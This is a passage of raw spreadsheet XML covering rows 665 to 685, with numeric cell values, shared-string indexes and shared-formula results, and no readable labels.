      </c>
      <c r="O665" s="29">
        <v>2.0</v>
      </c>
      <c r="P665" s="29">
        <v>5.0</v>
      </c>
      <c r="Q665" s="15"/>
      <c r="R665" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S665" s="15"/>
      <c r="T665" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U665" s="5"/>
      <c r="V665" s="5"/>
      <c r="W665" s="47"/>
      <c r="X665" s="45"/>
      <c r="Y665" s="45"/>
      <c r="Z665" s="38" t="s">
        <v>3011</v>
      </c>
      <c r="AA665" s="39" t="s">
        <v>3012</v>
      </c>
      <c r="AB665" s="38" t="s">
        <v>1083</v>
      </c>
      <c r="AC665" s="40">
        <v>80013.0</v>
      </c>
      <c r="AD665" s="5"/>
      <c r="AE665" s="14"/>
      <c r="AF665" s="14"/>
    </row>
    <row r="666">
      <c r="A666" s="6">
        <f t="shared" si="1"/>
        <v>0.1462264082</v>
      </c>
      <c r="B666" s="29">
        <v>1.0</v>
      </c>
      <c r="C666" s="29">
        <v>183041.0</v>
      </c>
      <c r="D666" s="14"/>
      <c r="E666" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F666" s="14"/>
      <c r="G666" s="29">
        <v>1.0</v>
      </c>
      <c r="H666" s="29">
        <v>340.0</v>
      </c>
      <c r="I666" s="29">
        <v>136412.0</v>
      </c>
      <c r="J666" s="15"/>
      <c r="K666" s="15"/>
      <c r="L666" s="15"/>
      <c r="M666" s="15"/>
      <c r="N666" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O666" s="29">
        <v>1.0</v>
      </c>
      <c r="P666" s="29">
        <v>0.0</v>
      </c>
      <c r="Q666" s="15"/>
      <c r="R666" s="15"/>
      <c r="S666" s="15"/>
      <c r="T666" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U666" s="5"/>
      <c r="V666" s="5"/>
      <c r="W666" s="47"/>
      <c r="X666" s="45"/>
      <c r="Y666" s="45"/>
      <c r="Z666" s="38" t="s">
        <v>3013</v>
      </c>
      <c r="AA666" s="39" t="s">
        <v>3014</v>
      </c>
      <c r="AB666" s="38" t="s">
        <v>2692</v>
      </c>
      <c r="AC666" s="40">
        <v>183032.0</v>
      </c>
      <c r="AD666" s="5"/>
      <c r="AE666" s="14"/>
      <c r="AF666" s="14"/>
    </row>
    <row r="667">
      <c r="A667" s="6">
        <f t="shared" si="1"/>
        <v>0.3055505638</v>
      </c>
      <c r="B667" s="29">
        <v>1.0</v>
      </c>
      <c r="C667" s="15"/>
      <c r="D667" s="14"/>
      <c r="E667" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F667" s="14"/>
      <c r="G667" s="29">
        <v>1.0</v>
      </c>
      <c r="H667" s="29">
        <v>236.0</v>
      </c>
      <c r="I667" s="29">
        <v>49135.0</v>
      </c>
      <c r="J667" s="15"/>
      <c r="K667" s="15"/>
      <c r="L667" s="15"/>
      <c r="M667" s="14"/>
      <c r="N667" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O667" s="29">
        <v>1.0</v>
      </c>
      <c r="P667" s="29">
        <v>3.0</v>
      </c>
      <c r="Q667" s="15"/>
      <c r="R667" s="15"/>
      <c r="S667" s="15"/>
      <c r="T667" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U667" s="5"/>
      <c r="V667" s="5"/>
      <c r="W667" s="45"/>
      <c r="X667" s="45"/>
      <c r="Y667" s="45"/>
      <c r="Z667" s="38" t="s">
        <v>3015</v>
      </c>
      <c r="AA667" s="39" t="s">
        <v>3016</v>
      </c>
      <c r="AB667" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC667" s="40">
        <v>144737.0</v>
      </c>
      <c r="AD667" s="5"/>
      <c r="AE667" s="14"/>
      <c r="AF667" s="14"/>
    </row>
    <row r="668">
      <c r="A668" s="6">
        <f t="shared" si="1"/>
        <v>0.7802522038</v>
      </c>
      <c r="B668" s="29">
        <v>1.0</v>
      </c>
      <c r="C668" s="29">
        <v>112126.0</v>
      </c>
      <c r="D668" s="14"/>
      <c r="E668" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F668" s="14"/>
      <c r="G668" s="29">
        <v>1.0</v>
      </c>
      <c r="H668" s="29">
        <v>657.0</v>
      </c>
      <c r="I668" s="29">
        <v>98589.0</v>
      </c>
      <c r="J668" s="15"/>
      <c r="K668" s="15"/>
      <c r="L668" s="15"/>
      <c r="M668" s="14"/>
      <c r="N668" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O668" s="29">
        <v>1.0</v>
      </c>
      <c r="P668" s="29">
        <v>4.0</v>
      </c>
      <c r="Q668" s="15"/>
      <c r="R668" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S668" s="15"/>
      <c r="T668" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U668" s="5"/>
      <c r="V668" s="5"/>
      <c r="W668" s="47"/>
      <c r="X668" s="45"/>
      <c r="Y668" s="45"/>
      <c r="Z668" s="38" t="s">
        <v>3017</v>
      </c>
      <c r="AA668" s="39" t="s">
        <v>3018</v>
      </c>
      <c r="AB668" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC668" s="40">
        <v>112081.0</v>
      </c>
      <c r="AD668" s="5"/>
      <c r="AE668" s="14"/>
      <c r="AF668" s="14"/>
    </row>
    <row r="669">
      <c r="A669" s="6">
        <f t="shared" si="1"/>
        <v>0.3632837242</v>
      </c>
      <c r="B669" s="29">
        <v>1.0</v>
      </c>
      <c r="C669" s="29">
        <v>33772.0</v>
      </c>
      <c r="D669" s="14"/>
      <c r="E669" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F669" s="14"/>
      <c r="G669" s="29">
        <v>24.0</v>
      </c>
      <c r="H669" s="29">
        <v>1163.0</v>
      </c>
      <c r="I669" s="29">
        <v>21234.0</v>
      </c>
      <c r="J669" s="15"/>
      <c r="K669" s="29">
        <v>21234.0</v>
      </c>
      <c r="L669" s="15"/>
      <c r="M669" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N669" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O669" s="29">
        <v>4.0</v>
      </c>
      <c r="P669" s="29">
        <v>3.0</v>
      </c>
      <c r="Q669" s="15"/>
      <c r="R669" s="15"/>
      <c r="S669" s="15"/>
      <c r="T669" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U669" s="5"/>
      <c r="V669" s="5"/>
      <c r="W669" s="47"/>
      <c r="X669" s="45"/>
      <c r="Y669" s="45"/>
      <c r="Z669" s="38" t="s">
        <v>3019</v>
      </c>
      <c r="AA669" s="39" t="s">
        <v>3020</v>
      </c>
      <c r="AB669" s="38" t="s">
        <v>3021</v>
      </c>
      <c r="AC669" s="40">
        <v>33768.0</v>
      </c>
      <c r="AD669" s="5"/>
      <c r="AE669" s="14"/>
      <c r="AF669" s="14"/>
    </row>
    <row r="670">
      <c r="A670" s="6">
        <f t="shared" si="1"/>
        <v>0.702441888</v>
      </c>
      <c r="B670" s="29">
        <v>1.0</v>
      </c>
      <c r="C670" s="15"/>
      <c r="D670" s="14"/>
      <c r="E670" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F670" s="14"/>
      <c r="G670" s="29">
        <v>2.0</v>
      </c>
      <c r="H670" s="29">
        <v>82.0</v>
      </c>
      <c r="I670" s="29">
        <v>277549.0</v>
      </c>
      <c r="J670" s="15"/>
      <c r="K670" s="29">
        <v>153494.0</v>
      </c>
      <c r="L670" s="15"/>
      <c r="M670" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N670" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O670" s="29">
        <v>0.0</v>
      </c>
      <c r="P670" s="29">
        <v>3.0</v>
      </c>
      <c r="Q670" s="15"/>
      <c r="R670" s="15"/>
      <c r="S670" s="15"/>
      <c r="T670" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U670" s="5"/>
      <c r="V670" s="5"/>
      <c r="W670" s="47"/>
      <c r="X670" s="45"/>
      <c r="Y670" s="45"/>
      <c r="Z670" s="38" t="s">
        <v>3022</v>
      </c>
      <c r="AA670" s="39" t="s">
        <v>3023</v>
      </c>
      <c r="AB670" s="38" t="s">
        <v>3024</v>
      </c>
      <c r="AC670" s="40">
        <v>261627.0</v>
      </c>
      <c r="AD670" s="5"/>
      <c r="AE670" s="14"/>
      <c r="AF670" s="14"/>
    </row>
    <row r="671">
      <c r="A671" s="6">
        <f t="shared" si="1"/>
        <v>0.2296832799</v>
      </c>
      <c r="B671" s="29">
        <v>1.0</v>
      </c>
      <c r="C671" s="29">
        <v>100852.0</v>
      </c>
      <c r="D671" s="14"/>
      <c r="E671" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F671" s="14"/>
      <c r="G671" s="29">
        <v>1.0</v>
      </c>
      <c r="H671" s="29">
        <v>413.0</v>
      </c>
      <c r="I671" s="29">
        <v>28790.0</v>
      </c>
      <c r="J671" s="15"/>
      <c r="K671" s="29">
        <v>19837.0</v>
      </c>
      <c r="L671" s="15"/>
      <c r="M671" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N671" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O671" s="29">
        <v>1.0</v>
      </c>
      <c r="P671" s="29">
        <v>7.0</v>
      </c>
      <c r="Q671" s="15"/>
      <c r="R671" s="15"/>
      <c r="S671" s="15"/>
      <c r="T671" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U671" s="5"/>
      <c r="V671" s="5"/>
      <c r="W671" s="47"/>
      <c r="X671" s="45"/>
      <c r="Y671" s="45"/>
      <c r="Z671" s="38" t="s">
        <v>3025</v>
      </c>
      <c r="AA671" s="39" t="s">
        <v>3026</v>
      </c>
      <c r="AB671" s="38" t="s">
        <v>3027</v>
      </c>
      <c r="AC671" s="40">
        <v>100689.0</v>
      </c>
      <c r="AD671" s="5"/>
      <c r="AE671" s="14"/>
      <c r="AF671" s="14"/>
    </row>
    <row r="672">
      <c r="A672" s="6">
        <f t="shared" si="1"/>
        <v>0.08382431854</v>
      </c>
      <c r="B672" s="29">
        <v>1.0</v>
      </c>
      <c r="C672" s="15"/>
      <c r="D672" s="14"/>
      <c r="E672" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F672" s="14"/>
      <c r="G672" s="29">
        <v>1.0</v>
      </c>
      <c r="H672" s="29">
        <v>118.0</v>
      </c>
      <c r="I672" s="29">
        <v>44880.0</v>
      </c>
      <c r="J672" s="15"/>
      <c r="K672" s="15"/>
      <c r="L672" s="15"/>
      <c r="M672" s="15"/>
      <c r="N672" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O672" s="29">
        <v>1.0</v>
      </c>
      <c r="P672" s="29">
        <v>0.0</v>
      </c>
      <c r="Q672" s="15"/>
      <c r="R672" s="15"/>
      <c r="S672" s="15"/>
      <c r="T672" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U672" s="5"/>
      <c r="V672" s="5"/>
      <c r="W672" s="47"/>
      <c r="X672" s="45"/>
      <c r="Y672" s="45"/>
      <c r="Z672" s="38" t="s">
        <v>3028</v>
      </c>
      <c r="AA672" s="39" t="s">
        <v>3029</v>
      </c>
      <c r="AB672" s="38" t="s">
        <v>790</v>
      </c>
      <c r="AC672" s="40">
        <v>261393.0</v>
      </c>
      <c r="AD672" s="5"/>
      <c r="AE672" s="14"/>
      <c r="AF672" s="14"/>
    </row>
    <row r="673">
      <c r="A673" s="6">
        <f t="shared" si="1"/>
        <v>0.1150760908</v>
      </c>
      <c r="B673" s="29">
        <v>1.0</v>
      </c>
      <c r="C673" s="29">
        <v>261664.0</v>
      </c>
      <c r="D673" s="14"/>
      <c r="E673" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F673" s="14"/>
      <c r="G673" s="29">
        <v>-1.0</v>
      </c>
      <c r="H673" s="29">
        <v>78.0</v>
      </c>
      <c r="I673" s="29">
        <v>277606.0</v>
      </c>
      <c r="J673" s="15"/>
      <c r="K673" s="29">
        <v>277606.0</v>
      </c>
      <c r="L673" s="15"/>
      <c r="M673" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N673" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O673" s="29">
        <v>1.0</v>
      </c>
      <c r="P673" s="29">
        <v>5.0</v>
      </c>
      <c r="Q673" s="15"/>
      <c r="R673" s="15"/>
      <c r="S673" s="15"/>
      <c r="T673" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U673" s="5"/>
      <c r="V673" s="5"/>
      <c r="W673" s="47"/>
      <c r="X673" s="45"/>
      <c r="Y673" s="45"/>
      <c r="Z673" s="38" t="s">
        <v>3030</v>
      </c>
      <c r="AA673" s="39" t="s">
        <v>3031</v>
      </c>
      <c r="AB673" s="38" t="s">
        <v>3032</v>
      </c>
      <c r="AC673" s="40">
        <v>261663.0</v>
      </c>
      <c r="AD673" s="5"/>
      <c r="AE673" s="14"/>
      <c r="AF673" s="14"/>
    </row>
    <row r="674">
      <c r="A674" s="6">
        <f t="shared" si="1"/>
        <v>0.5319616029</v>
      </c>
      <c r="B674" s="29">
        <v>1.0</v>
      </c>
      <c r="C674" s="15"/>
      <c r="D674" s="14"/>
      <c r="E674" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F674" s="14"/>
      <c r="G674" s="29">
        <v>3.0</v>
      </c>
      <c r="H674" s="29">
        <v>9475.0</v>
      </c>
      <c r="I674" s="29">
        <v>195880.0</v>
      </c>
      <c r="J674" s="15"/>
      <c r="K674" s="29">
        <v>106285.0</v>
      </c>
      <c r="L674" s="15"/>
      <c r="M674" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N674" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O674" s="29">
        <v>3.0</v>
      </c>
      <c r="P674" s="29">
        <v>0.0</v>
      </c>
      <c r="Q674" s="15"/>
      <c r="R674" s="15"/>
      <c r="S674" s="15"/>
      <c r="T674" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U674" s="5"/>
      <c r="V674" s="5"/>
      <c r="W674" s="47"/>
      <c r="X674" s="45"/>
      <c r="Y674" s="45"/>
      <c r="Z674" s="38" t="s">
        <v>3033</v>
      </c>
      <c r="AA674" s="39" t="s">
        <v>3034</v>
      </c>
      <c r="AB674" s="38" t="s">
        <v>3035</v>
      </c>
      <c r="AC674" s="40">
        <v>200736.0</v>
      </c>
      <c r="AD674" s="5"/>
      <c r="AE674" s="14"/>
      <c r="AF674" s="14"/>
    </row>
    <row r="675">
      <c r="A675" s="6">
        <f t="shared" si="1"/>
        <v>0.2329263919</v>
      </c>
      <c r="B675" s="29">
        <v>1.0</v>
      </c>
      <c r="C675" s="15"/>
      <c r="D675" s="14"/>
      <c r="E675" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F675" s="14"/>
      <c r="G675" s="29">
        <v>12.0</v>
      </c>
      <c r="H675" s="29">
        <v>7093.0</v>
      </c>
      <c r="I675" s="29">
        <v>17943.0</v>
      </c>
      <c r="J675" s="15"/>
      <c r="K675" s="15"/>
      <c r="L675" s="15"/>
      <c r="M675" s="14"/>
      <c r="N675" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O675" s="29">
        <v>5.0</v>
      </c>
      <c r="P675" s="29">
        <v>1.0</v>
      </c>
      <c r="Q675" s="15"/>
      <c r="R675" s="15"/>
      <c r="S675" s="15"/>
      <c r="T675" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U675" s="5"/>
      <c r="V675" s="5"/>
      <c r="W675" s="47"/>
      <c r="X675" s="45"/>
      <c r="Y675" s="45"/>
      <c r="Z675" s="38" t="s">
        <v>3036</v>
      </c>
      <c r="AA675" s="39" t="s">
        <v>3037</v>
      </c>
      <c r="AB675" s="38" t="s">
        <v>3038</v>
      </c>
      <c r="AC675" s="40">
        <v>25917.0</v>
      </c>
      <c r="AD675" s="5"/>
      <c r="AE675" s="14"/>
      <c r="AF675" s="14"/>
    </row>
    <row r="676">
      <c r="A676" s="6">
        <f t="shared" si="1"/>
        <v>0.8593766251</v>
      </c>
      <c r="B676" s="29">
        <v>1.0</v>
      </c>
      <c r="C676" s="15"/>
      <c r="D676" s="14"/>
      <c r="E676" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F676" s="14"/>
      <c r="G676" s="29">
        <v>3.0</v>
      </c>
      <c r="H676" s="29">
        <v>810.0</v>
      </c>
      <c r="I676" s="29">
        <v>135735.0</v>
      </c>
      <c r="J676" s="15"/>
      <c r="K676" s="29">
        <v>135735.0</v>
      </c>
      <c r="L676" s="15"/>
      <c r="M676" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N676" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O676" s="29">
        <v>3.0</v>
      </c>
      <c r="P676" s="29">
        <v>0.0</v>
      </c>
      <c r="Q676" s="15"/>
      <c r="R676" s="15"/>
      <c r="S676" s="15"/>
      <c r="T676" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U676" s="5"/>
      <c r="V676" s="5"/>
      <c r="W676" s="47"/>
      <c r="X676" s="45"/>
      <c r="Y676" s="45"/>
      <c r="Z676" s="38" t="s">
        <v>3039</v>
      </c>
      <c r="AA676" s="39" t="s">
        <v>3040</v>
      </c>
      <c r="AB676" s="38" t="s">
        <v>3041</v>
      </c>
      <c r="AC676" s="40">
        <v>261349.0</v>
      </c>
      <c r="AD676" s="5"/>
      <c r="AE676" s="14"/>
      <c r="AF676" s="14"/>
    </row>
    <row r="677">
      <c r="A677" s="6">
        <f t="shared" si="1"/>
        <v>0.5867769547</v>
      </c>
      <c r="B677" s="29">
        <v>1.0</v>
      </c>
      <c r="C677" s="15"/>
      <c r="D677" s="14"/>
      <c r="E677" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F677" s="14"/>
      <c r="G677" s="29">
        <v>6.0</v>
      </c>
      <c r="H677" s="29">
        <v>1233.0</v>
      </c>
      <c r="I677" s="29">
        <v>2305.0</v>
      </c>
      <c r="J677" s="15"/>
      <c r="K677" s="29">
        <v>655.0</v>
      </c>
      <c r="L677" s="15"/>
      <c r="M677" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N677" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O677" s="29">
        <v>3.0</v>
      </c>
      <c r="P677" s="29">
        <v>0.0</v>
      </c>
      <c r="Q677" s="15"/>
      <c r="R677" s="15"/>
      <c r="S677" s="15"/>
      <c r="T677" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U677" s="5"/>
      <c r="V677" s="5"/>
      <c r="W677" s="45"/>
      <c r="X677" s="45"/>
      <c r="Y677" s="45"/>
      <c r="Z677" s="38" t="s">
        <v>3042</v>
      </c>
      <c r="AA677" s="39" t="s">
        <v>3043</v>
      </c>
      <c r="AB677" s="38" t="s">
        <v>3044</v>
      </c>
      <c r="AC677" s="40">
        <v>3493.0</v>
      </c>
      <c r="AD677" s="5"/>
      <c r="AE677" s="14"/>
      <c r="AF677" s="14"/>
    </row>
    <row r="678">
      <c r="A678" s="6">
        <f t="shared" si="1"/>
        <v>0.6942421797</v>
      </c>
      <c r="B678" s="29">
        <v>1.0</v>
      </c>
      <c r="C678" s="15"/>
      <c r="D678" s="14"/>
      <c r="E678" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F678" s="14"/>
      <c r="G678" s="29">
        <v>13.0</v>
      </c>
      <c r="H678" s="29">
        <v>2015.0</v>
      </c>
      <c r="I678" s="29">
        <v>29394.0</v>
      </c>
      <c r="J678" s="15"/>
      <c r="K678" s="29">
        <v>29394.0</v>
      </c>
      <c r="L678" s="15"/>
      <c r="M678" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N678" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O678" s="29">
        <v>5.0</v>
      </c>
      <c r="P678" s="29">
        <v>3.0</v>
      </c>
      <c r="Q678" s="15"/>
      <c r="R678" s="15"/>
      <c r="S678" s="15"/>
      <c r="T678" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U678" s="5"/>
      <c r="V678" s="5"/>
      <c r="W678" s="47"/>
      <c r="X678" s="45"/>
      <c r="Y678" s="45"/>
      <c r="Z678" s="38" t="s">
        <v>3045</v>
      </c>
      <c r="AA678" s="39" t="s">
        <v>3046</v>
      </c>
      <c r="AB678" s="38" t="s">
        <v>3047</v>
      </c>
      <c r="AC678" s="40">
        <v>74194.0</v>
      </c>
      <c r="AD678" s="5"/>
      <c r="AE678" s="14"/>
      <c r="AF678" s="14"/>
    </row>
    <row r="679">
      <c r="A679" s="6">
        <f t="shared" si="1"/>
        <v>0.7283360674</v>
      </c>
      <c r="B679" s="29">
        <v>1.0</v>
      </c>
      <c r="C679" s="15"/>
      <c r="D679" s="14"/>
      <c r="E679" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F679" s="14"/>
      <c r="G679" s="29">
        <v>12.0</v>
      </c>
      <c r="H679" s="29">
        <v>51381.0</v>
      </c>
      <c r="I679" s="29">
        <v>81923.0</v>
      </c>
      <c r="J679" s="15"/>
      <c r="K679" s="29">
        <v>81923.0</v>
      </c>
      <c r="L679" s="15"/>
      <c r="M679" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N679" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O679" s="29">
        <v>8.0</v>
      </c>
      <c r="P679" s="29">
        <v>10.0</v>
      </c>
      <c r="Q679" s="15"/>
      <c r="R679" s="15"/>
      <c r="S679" s="15"/>
      <c r="T679" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U679" s="5"/>
      <c r="V679" s="5"/>
      <c r="W679" s="47"/>
      <c r="X679" s="45"/>
      <c r="Y679" s="45"/>
      <c r="Z679" s="38" t="s">
        <v>3048</v>
      </c>
      <c r="AA679" s="39" t="s">
        <v>3049</v>
      </c>
      <c r="AB679" s="38" t="s">
        <v>3050</v>
      </c>
      <c r="AC679" s="40">
        <v>127139.0</v>
      </c>
      <c r="AD679" s="5"/>
      <c r="AE679" s="14"/>
      <c r="AF679" s="14"/>
    </row>
    <row r="680">
      <c r="A680" s="6">
        <f t="shared" si="1"/>
        <v>0.2879634298</v>
      </c>
      <c r="B680" s="29">
        <v>1.0</v>
      </c>
      <c r="C680" s="29">
        <v>154709.0</v>
      </c>
      <c r="D680" s="14"/>
      <c r="E680" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F680" s="14"/>
      <c r="G680" s="29">
        <v>8.0</v>
      </c>
      <c r="H680" s="29">
        <v>602.0</v>
      </c>
      <c r="I680" s="29">
        <v>5858.0</v>
      </c>
      <c r="J680" s="15"/>
      <c r="K680" s="15"/>
      <c r="L680" s="15"/>
      <c r="M680" s="15"/>
      <c r="N680" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O680" s="29">
        <v>5.0</v>
      </c>
      <c r="P680" s="29">
        <v>5.0</v>
      </c>
      <c r="Q680" s="15"/>
      <c r="R680" s="15"/>
      <c r="S680" s="15"/>
      <c r="T680" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U680" s="5"/>
      <c r="V680" s="5"/>
      <c r="W680" s="47"/>
      <c r="X680" s="45"/>
      <c r="Y680" s="45"/>
      <c r="Z680" s="38" t="s">
        <v>3051</v>
      </c>
      <c r="AA680" s="39" t="s">
        <v>3052</v>
      </c>
      <c r="AB680" s="38" t="s">
        <v>3053</v>
      </c>
      <c r="AC680" s="40">
        <v>154658.0</v>
      </c>
      <c r="AD680" s="5"/>
      <c r="AE680" s="14"/>
      <c r="AF680" s="14"/>
    </row>
    <row r="681">
      <c r="A681" s="6">
        <f t="shared" si="1"/>
        <v>0.08009040612</v>
      </c>
      <c r="B681" s="29">
        <v>1.0</v>
      </c>
      <c r="C681" s="15"/>
      <c r="D681" s="14"/>
      <c r="E681" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F681" s="14"/>
      <c r="G681" s="29">
        <v>1.0</v>
      </c>
      <c r="H681" s="29">
        <v>416.0</v>
      </c>
      <c r="I681" s="29">
        <v>124333.0</v>
      </c>
      <c r="J681" s="15"/>
      <c r="K681" s="15"/>
      <c r="L681" s="15"/>
      <c r="M681" s="15"/>
      <c r="N681" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O681" s="29">
        <v>3.0</v>
      </c>
      <c r="P681" s="29">
        <v>4.0</v>
      </c>
      <c r="Q681" s="15"/>
      <c r="R681" s="15"/>
      <c r="S681" s="15"/>
      <c r="T681" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U681" s="5"/>
      <c r="V681" s="5"/>
      <c r="W681" s="47"/>
      <c r="X681" s="45"/>
      <c r="Y681" s="45"/>
      <c r="Z681" s="38" t="s">
        <v>3054</v>
      </c>
      <c r="AA681" s="39" t="s">
        <v>3055</v>
      </c>
      <c r="AB681" s="38" t="s">
        <v>1860</v>
      </c>
      <c r="AC681" s="40">
        <v>161786.0</v>
      </c>
      <c r="AD681" s="5"/>
      <c r="AE681" s="14"/>
      <c r="AF681" s="14"/>
    </row>
    <row r="682">
      <c r="A682" s="6">
        <f t="shared" si="1"/>
        <v>0.3779208524</v>
      </c>
      <c r="B682" s="29">
        <v>1.0</v>
      </c>
      <c r="C682" s="29">
        <v>98429.0</v>
      </c>
      <c r="D682" s="14"/>
      <c r="E682" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F682" s="14"/>
      <c r="G682" s="29">
        <v>24.0</v>
      </c>
      <c r="H682" s="29">
        <v>78011.0</v>
      </c>
      <c r="I682" s="29">
        <v>56061.0</v>
      </c>
      <c r="J682" s="15"/>
      <c r="K682" s="29">
        <v>98538.0</v>
      </c>
      <c r="L682" s="15"/>
      <c r="M682" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N682" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O682" s="29">
        <v>6.0</v>
      </c>
      <c r="P682" s="29">
        <v>9.0</v>
      </c>
      <c r="Q682" s="15"/>
      <c r="R682" s="15"/>
      <c r="S682" s="15"/>
      <c r="T682" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U682" s="5"/>
      <c r="V682" s="5"/>
      <c r="W682" s="47"/>
      <c r="X682" s="45"/>
      <c r="Y682" s="45"/>
      <c r="Z682" s="38" t="s">
        <v>3056</v>
      </c>
      <c r="AA682" s="39" t="s">
        <v>3057</v>
      </c>
      <c r="AB682" s="38" t="s">
        <v>3058</v>
      </c>
      <c r="AC682" s="40">
        <v>98425.0</v>
      </c>
      <c r="AD682" s="5"/>
      <c r="AE682" s="14"/>
      <c r="AF682" s="14"/>
    </row>
    <row r="683">
      <c r="A683" s="6">
        <f t="shared" si="1"/>
        <v>0.6041821618</v>
      </c>
      <c r="B683" s="29">
        <v>1.0</v>
      </c>
      <c r="C683" s="15"/>
      <c r="D683" s="14"/>
      <c r="E683" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F683" s="14"/>
      <c r="G683" s="29">
        <v>3.0</v>
      </c>
      <c r="H683" s="29">
        <v>234.0</v>
      </c>
      <c r="I683" s="29">
        <v>16032.0</v>
      </c>
      <c r="J683" s="15"/>
      <c r="K683" s="15"/>
      <c r="L683" s="15"/>
      <c r="M683" s="15"/>
      <c r="N683" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O683" s="29">
        <v>1.0</v>
      </c>
      <c r="P683" s="29">
        <v>1.0</v>
      </c>
      <c r="Q683" s="15"/>
      <c r="R683" s="15"/>
      <c r="S683" s="15"/>
      <c r="T683" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U683" s="5"/>
      <c r="V683" s="5"/>
      <c r="W683" s="47"/>
      <c r="X683" s="45"/>
      <c r="Y683" s="45"/>
      <c r="Z683" s="38" t="s">
        <v>3059</v>
      </c>
      <c r="AA683" s="39" t="s">
        <v>3060</v>
      </c>
      <c r="AB683" s="38" t="s">
        <v>3061</v>
      </c>
      <c r="AC683" s="40">
        <v>72844.0</v>
      </c>
      <c r="AD683" s="5"/>
      <c r="AE683" s="14"/>
      <c r="AF683" s="14"/>
    </row>
    <row r="684">
      <c r="A684" s="6">
        <f t="shared" si="1"/>
        <v>0.9385285636</v>
      </c>
      <c r="B684" s="29">
        <v>1.0</v>
      </c>
      <c r="C684" s="15"/>
      <c r="D684" s="14"/>
      <c r="E684" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F684" s="14"/>
      <c r="G684" s="29">
        <v>-1.0</v>
      </c>
      <c r="H684" s="29">
        <v>409.0</v>
      </c>
      <c r="I684" s="29">
        <v>261404.0</v>
      </c>
      <c r="J684" s="15"/>
      <c r="K684" s="29">
        <v>98538.0</v>
      </c>
      <c r="L684" s="15"/>
      <c r="M684" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N684" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O684" s="29">
        <v>1.0</v>
      </c>
      <c r="P684" s="29">
        <v>3.0</v>
      </c>
      <c r="Q684" s="15"/>
      <c r="R684" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S684" s="15"/>
      <c r="T684" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U684" s="5"/>
      <c r="V684" s="5"/>
      <c r="W684" s="47"/>
      <c r="X684" s="45"/>
      <c r="Y684" s="45"/>
      <c r="Z684" s="38" t="s">
        <v>3062</v>
      </c>
      <c r="AA684" s="39" t="s">
        <v>3063</v>
      </c>
      <c r="AB684" s="38" t="s">
        <v>1698</v>
      </c>
      <c r="AC684" s="40">
        <v>252442.0</v>
      </c>
      <c r="AD684" s="5"/>
      <c r="AE684" s="14"/>
      <c r="AF684" s="14"/>
    </row>
    <row r="685">
      <c r="A685" s="6">
        <f t="shared" si="1"/>
        <v>0.6754037716</v>
      </c>
      <c r="B685" s="29">
        <v>1.0</v>
      </c>
      <c r="C685" s="15"/>
      <c r="D685" s="14"/>
      <c r="E685" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F685" s="14"/>
      <c r="G685" s="29">
